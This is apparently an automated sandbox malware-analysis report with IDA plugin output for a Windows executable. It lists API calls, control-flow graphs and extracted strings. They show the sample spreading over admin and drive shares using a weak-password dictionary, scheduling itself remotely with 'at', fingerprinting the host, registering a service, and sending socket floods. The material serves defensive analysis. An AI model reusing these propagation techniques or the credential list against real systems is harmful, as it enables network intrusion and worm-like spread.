                                                                                              • Opcode Fuzzy Hash: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
                                                                                              • Instruction Fuzzy Hash: D9E00235C512699BCF72AF54CC8869DBA79AF00302F5501FAB10D781608B392FD0DE04

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 535 406090-40623a LoadLibraryA 6D0C6DE0 LoadLibraryA 6D0C6DE0 GetSystemDefaultUILanguage memset 537 40625c-406263 535->537 538 40623c-406259 _mbscpy 535->538 539 406265-40626c 537->539 540 40628b-406292 537->540 538->537 539->540 541 40626e-406288 _mbscpy 539->541 542 406294-40629b 540->542 543 4062bd-4062c4 540->543 541->540 542->543 544 40629d-4062ba _mbscpy 542->544 545 4062c6-4062cd 543->545 546 4062ef-4062f6 543->546 544->543 545->546 549 4062cf-4062ec _mbscpy 545->549 547 4062f8-4062ff 546->547 548 40634d-406354 546->548 547->548 550 406301-40630c 547->550 551 406356-40635d 548->551 552 4063ac-4063b3 548->552 549->546 553 40632d-40634a _mbscpy 550->553 554 40630e-40632b _mbscpy 550->554 551->552 555 40635f-40636b 551->555 556 4063b5-4063bc 552->556 557 40640e-406415 552->557 553->548 554->548 558 40638c-4063a9 _mbscpy 555->558 559 40636d-40638a _mbscpy 555->559 556->557 560 4063be-4063ca 556->560 561 406440-406508 sprintf _mbscpy lstrcpy 557->561 562 406417-40641e 557->562 558->552 559->552 564 4063cc-4063ec _mbscpy 560->564 565 4063ee-40640b _mbscpy 560->565 567 4065d6-406652 _mbscpy 561->567 568 40650e-4065d4 RegQueryValueExA GetSystemInfo memset sprintf _mbscpy 561->568 562->561 563 406420-40643d _mbscpy 562->563 563->561 564->557 565->557 569 406655-4066e5 GlobalMemoryStatusEx call 4069e0 * 2 wsprintfA malloc GetAdaptersInfo 567->569 568->569 575 406704-406713 GetAdaptersInfo 569->575 576 4066e7-406701 free malloc 569->576 577 406953-406967 free 575->577 578 406719-40671d 575->578 576->575 580 406974-406986 577->580 581 406969-40696f GetTickCount 577->581 578->577 579 406723-40673b strcmp 578->579 582 406741-406781 GetIfTable 579->582 583 406946-40694e 579->583 581->580 582->583 584 406787-4067af ??2@YAPAXI@Z 582->584 583->578 584->583 585 4067b5-4067d7 GetIfTable 584->585 586 40692b-406943 ??3@YAXPAX@Z 585->586 587 4067dd-406806 585->587 586->583 587->586 589 40680c-406826 587->589 590 406926 589->590 591 40682c-406846 589->591 591->590 592 40684c-40686e 591->592 592->590 593 406874-4068af 592->593 594 4068f1-406923 sprintf _mbscpy 593->594 595 4068b1-4068ef sprintf _mbscpy 593->595 594->590 595->590
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,6D0C6DE0), ref: 004060A4
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004060AB
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004060C8
                                                                                              • GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                                                                              • memset.MSVCRT ref: 004060F2
                                                                                              • _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                                                                              • _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                                                                              • _mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
                                                                                              • _mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
                                                                                              • _mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
                                                                                              • _mbscpy.MSVCRT(0000005D,2008), ref: 00406345
                                                                                              • _mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
                                                                                              • _mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
                                                                                              • _mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
                                                                                              • _mbscpy.MSVCRT(0000005D,2012), ref: 00406406
                                                                                              • _mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
                                                                                              • sprintf.MSVCRT ref: 0040649C
                                                                                              • _mbscpy.MSVCRT(0000005D,?), ref: 004064B3
                                                                                              • lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
                                                                                              • RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
                                                                                              • GetSystemInfo.KERNEL32(?), ref: 0040655F
                                                                                              • memset.MSVCRT ref: 00406570
                                                                                              • sprintf.MSVCRT ref: 004065B5
                                                                                              • _mbscpy.MSVCRT(-00000003,?), ref: 004065CC
                                                                                              • _mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00406666
                                                                                              • __aulldiv.LIBCMT ref: 00406681
                                                                                              • __aulldiv.LIBCMT ref: 0040668F
                                                                                              • wsprintfA.USER32 ref: 004066B4
                                                                                              • malloc.MSVCRT ref: 004066C9
                                                                                              • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
                                                                                              • free.MSVCRT ref: 004066EB
                                                                                              • malloc.MSVCRT ref: 004066F8
                                                                                              • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
                                                                                              • strcmp.MSVCRT ref: 00406731
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                                                                              • sprintf.MSVCRT ref: 004068CD
                                                                                              • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$Infosprintf$AdaptersLibraryLoadSystemTable__aulldivmallocmemset$??2@DefaultGlobalLanguageMemoryQueryStatusValuefreelstrcpystrcmpwsprintf
                                                                                              • String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
                                                                                              • API String ID: 2090821033-2163519892
                                                                                              • Opcode ID: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
                                                                                              • Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
                                                                                              • Opcode Fuzzy Hash: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
                                                                                              • Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: sprintf$memset$LibraryLoad$Sleep$ExecFileLocalModuleNameTimelstrcmp
                                                                                              • String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$at \\%s %d:%d %s$lstrcpyA$mpr.dll
                                                                                              • API String ID: 1199448054-2568294205
                                                                                              • Opcode ID: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
                                                                                              • Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
                                                                                              • Opcode Fuzzy Hash: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
                                                                                              • Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405261
                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00405272
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00405291
                                                                                              • LockResource.KERNEL32(00000000), ref: 004052A9
                                                                                              • wsprintfA.USER32 ref: 004052C4
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
                                                                                              • lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
                                                                                              • WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405326
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileResource$LoadWrite$CloseFindHandleLibraryLockPointerlstrlenwsprintf
                                                                                              • String ID: SizeofResource$hra%u.dll$kernel32.dll
                                                                                              • API String ID: 496033514-2774179399
                                                                                              • Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                                                                              • Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
                                                                                              • Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                                                                              • Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4
                                                                                              APIs
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00403E70,Defghi Klmnopqr Tuv), ref: 00403523
                                                                                              • OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
                                                                                              • DeleteService.ADVAPI32(00000000), ref: 0040354C
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00403556
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandleOpen$DeleteManager
                                                                                              • String ID: Defghi Klmnopqr Tuv
                                                                                              • API String ID: 204194956-1553144822
                                                                                              • Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                                                                              • Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
                                                                                              • Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                                                                              • Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9
                                                                                              APIs
                                                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00403706
                                                                                              • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040371F
                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 00403738
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recvselect
                                                                                              • String ID:
                                                                                              • API String ID: 741273618-0
                                                                                              • Opcode ID: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
                                                                                              • Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
                                                                                              • Opcode Fuzzy Hash: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
                                                                                              • Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004055E1
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004055F4
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405602
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00405663
                                                                                              • LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004056F2
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040574D
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040578D
                                                                                              • exit.MSVCRT ref: 004057A7
                                                                                              • wsprintfA.USER32 ref: 004057D2
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00405806
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 0040581E
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00405838
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
                                                                                              • CloseHandle.KERNEL32 ref: 00405865
                                                                                              • Sleep.KERNEL32(0000012C), ref: 00405883
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$CreateSleepThread$Startup$CloseHandleObjectSingleWaitexitwsprintf
                                                                                              • String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
                                                                                              • API String ID: 434866226-3768298475
                                                                                              • Opcode ID: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
                                                                                              • Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
                                                                                              • Opcode Fuzzy Hash: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
                                                                                              • Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040536E
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040537C
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040538E
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004053A0
                                                                                              • memset.MSVCRT ref: 00405483
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 0040551C
                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405533
                                                                                              • GlobalFree.KERNEL32(?), ref: 00405540
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405547
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405552
                                                                                              • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
                                                                                              • UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
                                                                                              • lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
                                                                                              • UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
                                                                                              • EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
                                                                                              • GlobalFree.KERNEL32(?), ref: 004055AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadResourceUpdate$Global$CloseFileFreeHandle$AllocBeginReadSizelstrlenmemset
                                                                                              • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                                                                              • API String ID: 78893175-1497069993
                                                                                              • Opcode ID: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
                                                                                              • Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
                                                                                              • Opcode Fuzzy Hash: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
                                                                                              • Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 751 402dd5-402f90 call 402a59 754 402f96-402fc2 gethostname 751->754 755 4030f8-4030fa 751->755 756 402fc8-402fdc gethostbyname 754->756 757 4030ed-4030f7 WSACleanup 754->757 756->757 758 402fe2-402fe4 756->758 757->755 759 402fe7-402fed 758->759 759->757 760 402ff3-403035 memset memcpy 759->760 761 403036-40307f memset sprintf 760->761 762 403081 761->762 763 4030cb-4030db 761->763 765 403084-40308b 762->765 763->761 764 4030e1-4030e8 763->764 764->759 766 4030c4-4030c9 765->766 767 40308d 765->767 766->763 766->765 768 403093-4030a5 Sleep 767->768 769 4030c1 768->769 770 4030a7-4030bf call 402ad0 768->770 769->766 770->768 770->769
                                                                                              APIs
                                                                                                • Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E
                                                                                              • gethostname.WS2_32(?,00000080), ref: 00402FBA
                                                                                              • gethostbyname.WS2_32(?), ref: 00402FCF
                                                                                              • memset.MSVCRT ref: 00402FFA
                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
                                                                                              • memset.MSVCRT ref: 00403049
                                                                                              • sprintf.MSVCRT ref: 0040306F
                                                                                              • Sleep.KERNEL32(000000C8), ref: 00403098
                                                                                              • WSACleanup.WS2_32 ref: 004030ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
                                                                                              • String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
                                                                                              • API String ID: 2657193355-195746125
                                                                                              • Opcode ID: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
                                                                                              • Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
                                                                                              • Opcode Fuzzy Hash: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
                                                                                              • Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406DD3
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406DE4
                                                                                                • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                                                                                • Part of subcall function 00406BD0: 6D0C6DE0.KERNEL32(00000000), ref: 00406BE2
                                                                                                • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                                                                                • Part of subcall function 00406C10: 6D0C6DE0.KERNEL32(00000000), ref: 00406C23
                                                                                                • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
                                                                                              • sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
                                                                                              • Sleep.KERNEL32(00000014), ref: 00406ECD
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406F13
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406F24
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406F35
                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 00406FA7
                                                                                              • send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00407032
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 0040703B
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00407077
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040708A
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040709B
                                                                                              • sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 004071AB
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00407210
                                                                                              • RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
